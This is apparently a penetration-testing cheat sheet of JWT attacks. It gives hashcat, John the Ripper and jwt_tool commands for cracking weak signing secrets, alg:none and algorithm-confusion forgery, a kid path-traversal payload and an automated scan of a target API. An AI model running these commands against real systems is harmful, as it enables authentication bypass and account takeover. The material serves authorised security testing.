Weak HMAC Secret hashcat hashcat -m 16500 jwt.txt /path/to/rockyou.txtMode 16500 = JWT. Add -r rules/best64.rule for rule-based attack. Weak HMAC Secret hashcat hashcat -m 16500 jwt.txt -a 3 ?a?a?a?a?a?aBrute-force mode. Use ?a for all ASCII printable chars. Weak HMAC Secret john john --format=HMAC-SHA256 jwt.txt --wordlist=/path/to/rockyou.txtJohn the Ripper - format varies by JWT algorithm. Weak HMAC Secret jwt_tool python3 jwt_tool.py <JWT> -C -d /path/to/wordlist.txt-C = crack mode, -d = dictionary file. Public Key Recovery rsa_sign2n python3 jwt_forgery.py "<JWT1>" "<JWT2>"Requires 2 RS256 tokens from same key. Outputs candidate public keys. Algorithm None jwt_tool python3 jwt_tool.py <JWT> -X a-X a = alg:none exploit. Tests all casing variants. Algorithm Confusion jwt_tool python3 jwt_tool.py <JWT> -X k -pk public.pemUses public.pem as HMAC secret for HS256 signing. KID Path Traversal jwt_tool python3 jwt_tool.py <JWT> -I -hc kid -hv "../../../../../../dev/null" -S hs256 -p ""-I = inject header claim, -hc = claim name, -hv = value. Generic Tampering jwt_tool python3 jwt_tool.py <JWT> -T-T = tampering mode (interactive). Good for manual claim modification. Scan for vulnerabilities jwt_tool python3 jwt_tool.py <JWT> -t https://target.com/api -rh 'Authorization: Bearer JWT' -M pb-M pb = playbook scan. Tests common JWT attack vectors automatically.